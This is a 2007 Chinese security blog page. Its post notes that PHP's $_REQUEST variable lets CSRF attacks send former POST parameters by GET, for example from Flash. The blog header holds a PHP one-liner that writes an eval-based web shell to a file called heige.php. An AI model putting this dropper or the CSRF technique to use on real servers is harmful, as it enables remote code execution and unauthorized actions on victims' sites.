5up3rh3i'blog[提供有偿web代码安全审计服务]

MSN:SuperHei@ph4nt0m.org< ?fputs(fopen('heige.php','w+'),'< ?php @eval($_POST[c])? >');? >
    <<  xss/csrf in penetration test | 首页 | SWFIntruder  >>

  • 2007-12-02

    Request变量与csrf

    版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
    http://superhei.blogbus.com/logs/11412189.html

    Request变量与csrf

    Request变量是superglobal可以通过get/post/cookie提交,那么在csrf攻击时候原来post的变量我们可以通过get提交,如果在flash里get提交要比post提交要容易,条件也不要那的麻烦 :)

     


    历史上的今天:

    郁闷!!! 2006-12-02

    随机文章:

    Flash Update 2008-01-03
    修电火箱 2008-01-01
    MS Access SQL Injection Cheat Sheet 2007-10-06
    Holes in most preg_match() filters 2007-04-07
    Servlet&JSP 技术概述 2006-11-16

    收藏到:Del.icio.us




    Tag:
    引用地址:
    superhei 发表于22:52:02 | 编辑 | 继续话题 | 转发 | 分享 0

    引用

    下面Blog引用了该文:

  • Bypass Preventing CSRF

    Blog:5up3rh3i'blog
    2008-01-07 20:12:34

    评论

  • 呵。呵
    chukka boots | 发表于2009-09-08 21:02:16 [回复]

管理

  • 进入后台 写新日志
  • 文章管理 评论管理
  • 更换模板 访问统计

搜索

最新文章

  • 在百度的blog
  • [zz]Phpcms 2007 远程文件包含漏洞
  • blog又又又被黑
  • [zz]Microsoft Blogs and Web Resources about Security
  • 学习WebZine [0x02]后乱谈
  • 犯了个很严重的错误 :(
  • Data:_URI_scheme
  • WebZine [0x02]
  • Bypassing script filters with variable-width encodings
  • A New Class of Vulnerability in Oracle: Lateral SQL Injection
全部日志>>

最新评论

  • asdf:I received my<a href=&quo...
  • asdf:I received my<a href=&quo...
  • cc4er:小竹的NBSI的确很经典··· 不过现在很多都不行了。...
  • puma shoes:好
  • Nike shoes:顶
  • puma shoes:顶
  • Nike Air Jordan:过客踩踩踩踩踩!!!!!!!!!!...
  • timberland shoes:顶
  • jeans:顶
  • Kids Boots:我们可以换个链接吗?...

链接

  • #########
  • 舒舒
  • 二哥哥
  • lanker
  • fa1l3n
  • axis
  • swap
  • lvhuana
  • spr1t3
  • 小沈
  • fox
  • 随便名字
  • GaRY
  • 7j
  • RAyH4c
  • #########
  • PST
  • HackTic
  • 2600
  • NGS
  • cgisecurity
  • owasp
  • seclists
  • argeniss
  • phpsec
  • bugtraq
  • milw0rm
  • phpsecure
  • T.H.C
  • webappsec
  • phpsec'blog
  • shiflett.org
  • secyou
  • Rst
  • waraxe
  • appsecinc
  • northern-monkee
  • blog.0x557
  • ush
  • EST
  • securityreason
  • infoshackers
  • zwell
  • spidynamics
  • morx
  • securitytracker
  • modsecurity
  • securiteam
  • securiteam's blog
  • phpclasse
  • hardened-php
  • csdn
  • pro-hack
  • f-secure
  • rubyforge
  • wisec
  • redteam-pentesting
  • alertpool
  • blog.php-security
  • timvw
  • sqlsec
  • sourceforge
  • zeroknock
  • qasec
  • hacksafe
  • smartsecurity
  • gulftech
  • thespanner
  • nth-dimension.org.uk
  • secweb
  • cera.secniche.org
  • swan不是牛
  • Getahead
  • xssed
  • kuza55
  • myappsecurity
  • xssworm
  • playhack
  • hackademix
  • manicode
  • switch
  • planet-websecurity
  • disenchant.ch
  • hackathology
  • blueinfy
  • bindshell
  • net-square
  • yaisb
  • sirdarckcat
  • googleonlinesecurity
  • ########
  • darkc0de
  • darknet
  • insecuremag
  • serversniff
  • tbs_pocket_knife
  • seeknot
  • php手册
  • frsirt-google
  • grip
  • vuln.watch
  • securitytracker.com
  • connectionstrings
  • oracle sec
  • r00tin
  • rawlab
  • sommarskog
  • taossa
  • neilcar
  • spl0it
  • notsosecure.com
  • dross
  • ie's blog
  • bluehat
  • 访问统计:
  • RSS 什么是RSS?
    用IM提醒我内容更新
    订阅到QQ邮箱
    订阅到鲜果阅读器
    订阅到Google阅读器
    订阅到抓虾阅读器
  • 《城客》第四期:创意之城
    博客大巴
    博客大巴使用指南
    博客大巴模板中心
    免费注册博客大巴
    一键博客搬家工具
    中文互动杂志城客
Copyright © 2002-2009 BlogBus.com, All Rights Reserved. 博客大巴 版权所有
博客大巴模板设计: 爱中国 | 作者: Keeno